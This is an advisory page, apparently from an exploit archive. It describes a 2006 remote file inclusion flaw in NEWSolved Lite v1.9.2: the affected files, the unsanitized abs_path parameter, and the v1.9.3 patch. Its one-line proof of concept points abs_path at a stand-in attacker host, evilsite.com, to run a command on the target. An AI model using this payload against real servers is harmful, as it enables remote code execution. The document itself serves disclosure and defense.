header-logo
Suggest Exploit
vendor:
NEWSolved Lite
by:
Philipp Niedziela
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: NEWSolved Lite
Affected Version From: 1.9.2
Affected Version To: 1.9.2
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

NEWSolved Lite v1.9.2 (abs_path) Remote File Inclusion

NEWSolved Lite v1.9.2 is vulnerable to Remote File Inclusion due to improper sanitization of the $abs_path parameter. This can lead to Remote File Execution.

Mitigation:

Download Patch v1.9.3 and replace the files above.
Source

Exploit-DB raw data:

+--------------------------------------------------------------------
+
+ NEWSolved Lite v1.9.2 (abs_path) Remote File Inclusion
+
+--------------------------------------------------------------------
+
+ Affected Software .: NEWSolved Lite v1.9.2 (maybe above)
+ Venedor ...........: http://www.usolved.net
+ Class .............: Remote File Inclusion
+ Risk ..............: high (Remote File Execution)
+ Found by ..........: Philipp Niedziela
+ Original advisory .: http://www.bb-pcsecurity.de/sicherheit_286.htm
+ Contact ...........: webmaster[at]bb-pcsecurity[.]de
+ http://www.bb-pcsecurity.de
+
+--------------------------------------------------------------------
+
+ Affected files:
+
+ newsscript_lyt.php
+ newsticker/newsscript_get.php
+ inc/output/news_theme1.php
+ inc/output/news_theme2.php
+ inc/output/news_theme3.php
+
+--------------------------------------------------------------------
+
+ $abs_path is not properly sanitized before being used
+
+--------------------------------------------------------------------
+
+ Solution:
+
+ Download Patch v1.9.3 and replace the files above.
+
+--------------------------------------------------------------------
+
+ PoC:
+
+ http://[target]/inc/output/news_theme1.php?abs_path=http://evilsite.com?cmd=ls
+
+-------------------------[ E O F ]----------------------------------

# milw0rm.com [2006-08-07]